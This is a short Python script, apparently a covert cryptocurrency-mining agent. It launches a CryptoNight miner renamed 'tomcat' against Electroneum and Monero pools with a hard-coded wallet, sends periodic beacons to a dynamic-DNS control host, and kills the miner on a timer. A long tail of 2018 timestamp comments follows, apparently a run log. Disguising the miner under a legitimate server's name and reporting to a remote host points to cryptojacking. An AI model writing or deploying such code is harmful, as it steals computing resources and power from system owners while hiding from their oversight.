import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:38:07.197602
#2018-02-17 16:24:06.298929
#2018-02-17 18:12:03.704987
#2018-02-17 19:59:03.957945
#2018-02-17 21:47:07.309907
#2018-02-17 23:33:07.165958
#2018-02-18 01:22:04.173260
#2018-02-18 03:09:06.732280
#2018-02-18 04:58:06.444977
#2018-02-18 06:52:05.288463
#2018-02-18 08:41:07.817967
#2018-02-18 10:27:07.296369
#2018-02-18 12:13:02.158008
#2018-02-18 13:59:04.792406
#2018-02-18 15:49:01.917010
#2018-02-18 17:39:01.791700
#2018-02-18 19:27:06.003972
#2018-02-18 21:12:01.332939
#2018-02-18 22:58:06.650393
#2018-02-19 00:46:04.838924
#2018-02-19 02:33:04.151376
#2018-02-19 04:19:05.666395
#2018-02-19 06:04:01.668563
#2018-02-19 07:52:05.379363
#2018-02-19 09:42:03.921449
#2018-02-19 11:32:02.909135
#2018-02-19 13:19:07.770726
#2018-02-19 15:07:02.055230
#2018-02-19 16:55:08.919322
#2018-02-19 18:43:08.035678
#2018-02-19 20:32:07.621701
#2018-02-19 22:20:09.568124
#2018-02-20 00:05:04.322181
#2018-02-20 01:51:06.346735
#2018-02-20 03:41:06.357339
#2018-02-20 05:27:06.312657
#2018-02-20 07:11:05.492237
#2018-02-20 08:56:07.709225
#2018-02-20 10:40:09.272983
#2018-02-20 12:26:06.481576
#2018-02-20 14:13:01.891212
#2018-02-20 15:55:08.642804
#2018-02-20 17:43:02.023157
#2018-02-20 19:33:07.432878
#2018-02-20 21:21:04.707763
#2018-02-20 23:06:07.754942
#2018-02-21 00:52:05.278253
#2018-02-21 02:37:05.925951
#2018-02-21 04:25:06.853013
#2018-02-21 06:14:07.454071
#2018-02-21 07:59:06.649838
#2018-02-21 09:44:07.123607
#2018-02-21 11:33:08.923098
#2018-02-21 13:21:10.330974
#2018-02-21 15:06:01.767731
#2018-02-21 16:55:02.998876
#2018-02-21 18:44:09.027912
#2018-02-21 20:32:07.027634
#2018-02-21 22:18:07.155319
#2018-02-22 00:07:07.800598
#2018-02-22 01:55:08.010955
#2018-02-22 03:42:02.198574
#2018-02-22 05:29:06.112007
#2018-02-22 07:14:05.924796
#2018-02-22 09:03:02.184342
#2018-02-22 10:51:08.440232
#2018-02-22 12:37:06.061110
#2018-02-22 14:22:02.096674
#2018-02-22 16:10:11.006190
#2018-02-22 17:57:12.195322
#2018-02-22 19:47:11.484904
#2018-02-22 21:38:03.805843
#2018-02-22 23:25:04.168632
#2018-02-23 01:12:06.498410
#2018-02-23 02:58:05.390925
#2018-02-23 04:44:06.592853
#2018-02-23 06:33:06.913274
#2018-02-23 08:22:05.116574
#2018-02-23 10:39:03.972027
#2018-02-23 12:33:06.392255
#2018-02-23 14:19:06.580329
#2018-02-23 16:12:01.263217
#2018-02-23 17:58:04.050253
#2018-02-23 19:45:01.559931
#2018-02-23 21:29:01.969213
#2018-02-23 23:17:06.226757
#2018-02-24 01:09:04.028855
#2018-02-24 03:01:01.595309
#2018-02-24 04:47:07.139969
#2018-02-24 06:33:05.873176
#2018-02-24 08:22:03.792303
#2018-02-24 10:05:02.262653
#2018-02-24 12:02:07.195957
#2018-02-24 13:50:04.312637
#2018-02-24 15:39:05.980749
#2018-02-24 17:33:04.937989
#2018-02-24 19:19:05.806644
#2018-02-24 21:09:02.001336
#2018-02-25 01:16:01.252816
#2018-02-25 05:13:05.617143
#2018-02-25 10:58:01.689310